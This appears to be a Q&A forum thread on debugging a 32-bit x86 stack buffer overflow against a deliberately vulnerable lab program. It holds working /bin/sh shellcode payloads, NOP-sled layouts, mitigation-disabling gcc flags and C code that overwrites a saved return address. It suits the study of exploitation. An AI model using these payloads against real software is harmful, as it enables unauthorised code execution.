
Why is my stack buffer overflow exploit not working?

I have a really simple stack overflow:

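#include <stdio.h>
#include <string.h>   /* memcpy, strlen */

int main(int argc, char *argv[]) {

    char buf[256];
    /* deliberately unchecked copy: overflows buf when argv[1] is longer than 256 bytes */
    memcpy(buf, argv[1], strlen(argv[1]));
    printf(buf);

}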

I'm trying to overflow with this code:

$(python -c "print '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*237 + 'c8f4ffbf'.decode('hex')")

When I overflow the stack, I successfully overwrite EIP with the address I want, but then nothing happens. My shellcode is not executed.

Does anyone see the problem? Note: My Python may be wrong.


UPDATE

What I don't understand is why my code is not executing. For instance, if I point EIP at NOPs, the NOPs never get executed. Like so,

$(python -c "print '\x90'*50 + 'A'*210 + '\xc8\xf4\xff\xbf'")

UPDATE

Could someone be kind enough to exploit this overflow yourself on linux x86 and post the results?


UPDATE

Never mind, y'all, I got it working. Thanks for all your help.


UPDATE

Well, I thought I did. I did get a shell, but now I'm trying again and I'm having problems.

All I'm doing is overflowing the buffer and pointing the return address at the beginning of it.

Like so,

r $(python -c 'print "A"*260 + "\xcc\xf5\xff\xbf"')

This should point to the A's. Now what I don't understand is why my address at the end gets changed in gdb.

This is what gdb gives me,

Program received signal SIGTRAP, Trace/breakpoint trap.
0xbffff5cd in ?? ()

The \xcc gets changed to \xcd. Could this have something to do with the error I get with gdb?

When I fill that address with "B"s, for instance, it resolves fine as \x42\x42\x42\x42. So what gives?

Any help would be appreciated.

Also, I'm compiling with the following options:

gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o so so.c

It's really odd because any other address works except the one I need.


UPDATE

I can successfully spawn a shell with the following in gdb,

$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")

But I don't understand why this works sometimes and not other times. Sometimes my overwritten EIP is changed by gdb. Does anyone know what I am missing? Also, I can only spawn a shell in gdb and not in the normal process. On top of that, I can only seem to start a shell once in gdb, and then gdb stops working.

For instance, now when I run the following I get this in gdb...

Starting program: /root/so $(python -c 'print "A"*260 + "\xc8\xf4\xff\xbf"')

Program received signal SIGSEGV, Segmentation fault.
0xbffff5cc in ?? ()

This seems to be caused by execstack being turned on.


UPDATE

Yeah, for some reason I'm getting different results but the exploit is working now. So thank you everyone for your help. If anyone can explain the results I received above, I'm all ears. Thanks.

Compilers and linkers enable several protections against this attack by default. For example, your stack may not be executable. You can check with:

readelf -l <filename>

If the output contains a line like this:

GNU_STACK 0x000000 0x00000000 0x00000000 0x00000 0x00000 RW 0x4

then the stack is only readable and writable (the flags are RW, with no E), so code placed on it cannot run. In that case you would have to "return to libc" to spawn your shell.
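As a rough illustration of what readelf is reporting there, the following Python 3 sketch reads the program headers directly and returns the flags of the GNU_STACK entry. The function name gnu_stack_flags is made up for this example, and the field offsets are the ones from the standard ELF32 and ELF64 header layouts; treat it as a sketch, not a replacement for readelf.

```python
import struct

PT_GNU_STACK = 0x6474E551  # p_type value of the GNU_STACK program header
PF_X = 0x1                 # execute permission bit in p_flags


def gnu_stack_flags(elf_bytes):
    """Return p_flags of the GNU_STACK program header, or None if there is none."""
    if elf_bytes[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    is64 = elf_bytes[4] == 2                  # EI_CLASS: 1 = 32-bit, 2 = 64-bit
    end = "<" if elf_bytes[5] == 1 else ">"   # EI_DATA: 1 = little-endian
    if is64:
        (phoff,) = struct.unpack_from(end + "Q", elf_bytes, 32)
        phentsize, phnum = struct.unpack_from(end + "HH", elf_bytes, 54)
        flags_off = 4                         # ELF64: p_flags follows p_type
    else:
        (phoff,) = struct.unpack_from(end + "I", elf_bytes, 28)
        phentsize, phnum = struct.unpack_from(end + "HH", elf_bytes, 42)
        flags_off = 24                        # ELF32: p_flags is the 7th word
    for i in range(phnum):
        base = phoff + i * phentsize
        (p_type,) = struct.unpack_from(end + "I", elf_bytes, base)
        if p_type == PT_GNU_STACK:
            (p_flags,) = struct.unpack_from(end + "I", elf_bytes, base + flags_off)
            return p_flags
    return None
```

For a binary named so, gnu_stack_flags(open("so", "rb").read()) & PF_X would be nonzero when the stack is marked executable (the RWE case) and zero for the RW line shown above.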

There could also be canary protection: the compiler places a known value between your local variables and the saved return address and checks it before the function returns. If your string has overwritten it, the program aborts instead of returning.
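To make the canary idea concrete, here is a toy Python 3 model of a stack frame. It is only a simulation under simplifying assumptions (an 8-byte buffer, a 4-byte canary, a 4-byte return address stored as the placeholder bytes RETN); run_with_canary is a hypothetical name, and real compilers implement the check in generated machine code.

```python
import os


def run_with_canary(data, buf_size=8, canary=None):
    """Copy data into a simulated frame and report what the function epilogue would do."""
    if canary is None:
        canary = os.urandom(4)               # unpredictable value chosen at startup
    # Simulated frame layout, low to high addresses: buf | canary | return address
    frame = bytearray(buf_size) + bytearray(canary) + bytearray(b"RETN")
    # Unchecked copy, like memcpy(buf, argv[1], strlen(argv[1]))
    n = min(len(data), len(frame))
    frame[:n] = data[:n]
    # Epilogue check: compare the stored canary with the original value
    if bytes(frame[buf_size:buf_size + 4]) != canary:
        return "abort: stack smashing detected"
    return "return to " + repr(bytes(frame[buf_size + 4:]))


if __name__ == "__main__":
    print(run_with_canary(b"A" * 8))         # fits in the buffer
    print(run_with_canary(b"A" * 16))        # runs over the canary and return address
```

Any overflow long enough to reach the return address has to pass through the canary first, which is why the check catches it.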

If you are trying this on your own program, consider disabling some of these protections with gcc options:

gcc -fno-stack-protector -z execstack

Also, a note on your payload: you usually put NOPs before your shellcode, so that you don't have to hit the exact address where the shellcode starts.

$(python -c "print '\x90'*37 +'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80' + 'A'*200 + '\xc8\xf4\xff\xbf'")

Note that you can adjust the low-order hex digits of the address that ends up in the instruction pointer so that it points somewhere inside your NOPs, not necessarily at the very beginning of your buffer.
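The layout just described (NOPs, code, filler, return address) can be sketched in Python 3 as follows. This is only an illustration: build_payload is a hypothetical helper, the 260-byte offset is taken from the payloads in the question, and the demo uses a 23-byte placeholder in place of the shellcode.

```python
import struct


def build_payload(code, ret_addr, offset=260, sled_len=37):
    """Return sled + code + filler (up to `offset` bytes) + little-endian address."""
    filler_len = offset - sled_len - len(code)
    if filler_len < 0:
        raise ValueError("sled and code do not fit in front of the return address")
    sled = b"\x90" * sled_len               # NOPs: landing anywhere here slides into code
    filler = b"A" * filler_len              # padding up to the saved return address
    address = struct.pack("<I", ret_addr)   # 0xbffff4c8 becomes b"\xc8\xf4\xff\xbf"
    return sled + code + filler + address


if __name__ == "__main__":
    placeholder = b"\xcc" * 23              # stand-in with the same length as the shellcode
    payload = build_payload(placeholder, 0xBFFFF4C8)
    print(len(payload), payload[-4:].hex())
```

Using struct.pack for the address avoids reversing the bytes by hand, which is an easy place to make a mistake on a little-endian machine.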

Of course gdb should become your best friend if you are trying something like that.

Hope this helps.

This isn't going to work too well [as written]. However, it is possible, so read on ...


It helps to know what the actual stack layout is when the main function is called. It's a bit more complicated than most people realize.

Assuming a POSIX OS (e.g. Linux), the kernel will set the stack pointer at a fixed address.

The kernel does the following:

It calculates how much space is needed for the environment variable strings (i.e. strlen("HOME=/home/me") + 1, summed over all environment variables) and "pushes" these strings onto the stack in a downward [towards lower memory] direction. It then counts how many there were (e.g. envcount), creates a char *envp[envcount + 1] on the stack, and fills in the envp values with pointers to the given strings. It null-terminates this envp array.

A similar process is done for the argv strings.

Then, the kernel loads the ELF interpreter. The kernel starts the process with the starting address of the ELF interpreter. The ELF interpreter [eventually] invokes the "start" function (eg _start from crt0.o ) which does some init and then calls main(argc,argv,envp)

This is [sort of] what the stack looks like when main gets called:

"HOME=/home/me"
"LOGNAME=me"
"SHELL=/bin/sh"

// alignment pad ...

char *envp[4] = {
    // address of "HOME" string
    // address of "LOGNAME" string
    // address of "SHELL" string
    NULL
};

// string for argv[0] ...
// string for argv[1] ...
// ...

char *argv[] = {
    // pointer to argument string 0
    // pointer to argument string 1
    // pointer to argument string 2
    NULL
}

// possibly more stuff put in by ELF interpreter ...

// possibly more stuff put in by _start function ...
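
A toy Python 3 model of the string placement may make the consequence clearer. It is a deliberate simplification (no alignment padding, no pointer arrays), place_strings is a hypothetical name, and STACK_TOP is an arbitrary illustrative value, not the real top of the stack. It shows that one extra environment variable shifts every string placed after it, which is one plausible reason the addresses seen under a debugger differ from those in a plain run.

```python
def place_strings(stack_top, strings):
    """Push NUL-terminated strings downward from stack_top.

    Returns a list of (string, address) pairs in push order.
    """
    placed = []
    addr = stack_top
    for s in strings:
        addr -= len(s.encode()) + 1   # +1 for the terminating NUL
        placed.append((s, addr))
    return placed


if __name__ == "__main__":
    STACK_TOP = 0xC0000000            # hypothetical value, for illustration only
    env = ["HOME=/home/me", "LOGNAME=me", "SHELL=/bin/sh"]
    argv = ["./so", "AAAA"]

    plain = dict(place_strings(STACK_TOP, env + argv))
    extra = dict(place_strings(STACK_TOP, env + ["LINES=24"] + argv))
    print("argv[1] moved down by", plain["AAAA"] - extra["AAAA"], "bytes")
```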

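On x86-64, the argc, argv, and envp values are passed to main in the first three argument registers of the ABI (rdi, rsi, and rdx under the System V calling convention). On 32-bit x86, which the 0xbfff.... addresses in the question suggest, they are pushed on the stack instead.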


Here's the problem [problems, plural, actually] ...

By the time all this is done, you have little to no idea what the address of the shell code is. So, any code you write must use position-independent addressing (RIP-relative on x86-64) and [probably] be built with -fPIC.

And, the resultant code can't have a zero byte in the middle, because it is conveyed [by the kernel] as a NUL-terminated string. So, a string that contains a zero (e.g. <byte0>,<byte1>,<byte2>,0x00,<byte4>,<byte5>,...) would only transfer the first three bytes and not the entire shell code program.
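A small Python 3 sketch of that truncation, assuming the bytes reach the program as an ordinary C string; as_c_string and first_nul are hypothetical helper names:

```python
def as_c_string(data):
    """Return the bytes that survive when data is passed as a NUL-terminated string."""
    return data.split(b"\x00", 1)[0]


def first_nul(data):
    """Return the index of the first zero byte, or -1 if there is none."""
    return data.find(b"\x00")


if __name__ == "__main__":
    blob = bytes([0x01, 0x02, 0x03, 0x00, 0x05, 0x06])
    print(first_nul(blob), as_c_string(blob).hex())
```

Running first_nul over a payload before using it is a cheap way to catch this problem early.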

Nor do you have a good idea as to what the stack pointer value is.

Also, you need to find the memory word on the stack that holds the return address (i.e. the value pushed by the start function's call main instruction).

This word containing the return address must be set to the address of the shell code. But, it doesn't always have a fixed offset relative to a main stack frame variable (eg buf ). So, you can't predict what word on the stack to modify to get the "return to shellcode" effect.

Also, on x86 architectures, there is special mitigation hardware. For example, a page can be marked NX [no execute]. This is usually done for certain segments, such as the stack. If the RIP is changed to point to the stack, the hardware will fault out.


Here's the [easy] solution ...

gcc has some intrinsic functions that can help: __builtin_return_address and __builtin_frame_address.

So, get the value of the real return address from the intrinsic [call this retadr]. Get the address of the stack frame [call this fp].

Starting from fp and incrementing (by sizeof(void*)) toward higher memory, find a word that matches retadr. This memory location is the one you want to modify to point to the shell code. It will probably be at offset 0 or 8.

Once fp points at that word, do *fp = argv[1] and return.

Note that the string pointed to by argv[1] lives on the stack, as mentioned above, so extra steps may be necessary if the stack has the NX bit set.


Here is some example code that works:

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>

void
shellcode(void)
{
    static char buf[] = "shellcode: hello\n";
    char *cp;

    for (cp = buf;  *cp != 0;  ++cp);

    // NOTE: in real shell code, we couldn't rely on using this function, so
    // these would need to be the CPP macro versions: _syscall3 and _syscall2
    // respectively or the syscall function would need to be _statically_
    // linked in
    syscall(SYS_write,1,buf,cp - buf);
    syscall(SYS_exit,0);
}

int
main(int argc,char **argv)
{
    void *retadr = __builtin_return_address(0);
    void **fp = __builtin_frame_address(0);
    int iter;

    printf("retadr=%p\n",retadr);
    printf("fp=%p\n",fp);

    // NOTE: for your example, replace:
    //   *fp = (void *) shellcode;
    // with:
    //   *fp = (void *) argv[1]

    for (iter = 20;  iter > 0;  --iter, fp += 1) {
        printf("fp=%p %p\n",fp,*fp);
        if (*fp == retadr) {
            *fp = (void *) shellcode;
            break;
        }
    }

    if (iter <= 0)
        printf("main: no match\n");

    return 0;
}

I was having similar problems when trying to perform a stack buffer overflow. I found that my return address in GDB was different than that in a normal process. What I did was add the following:

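unsigned long printesp(void){
    unsigned long sp;
    /* copy ESP into sp and return it explicitly (32-bit x86 only) */
    __asm__("movl %%esp,%0" : "=r"(sp));
    return sp;
}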

I called it at the end of main, right before the return, and printed the result to get an idea of where the stack was. From there I just played with that value, subtracting 4 from the printed ESP until it worked.
